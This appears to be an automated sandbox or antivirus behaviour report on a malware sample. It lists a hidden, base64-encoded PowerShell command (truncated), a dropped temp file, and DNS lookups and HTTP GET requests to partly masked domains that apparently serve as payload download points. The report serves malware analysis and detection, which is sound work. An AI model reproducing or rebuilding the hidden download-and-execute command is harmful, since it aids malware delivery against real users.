Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
Modifies file system
Creates the following files
- %TEMP%\697886.cvr
Network activity
Connects to
- 'ah#.#rbdev.com':80
- 'e-##ow.be':80
- 'qw##o.com':443
TCP
HTTP GET requests
- http://ah#.#rbdev.com/wp-admin/qp0/
- http://e-##ow.be/verde/in6k/
Other
- 'qw##o.com':443
UDP
- DNS ASK ah#.#rbdev.com
- DNS ASK e-##ow.be
- DNS ASK ma#####centpakistan.com
- DNS ASK qw##o.com
- DNS ASK si###uposo.com
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...' (with hidden window)
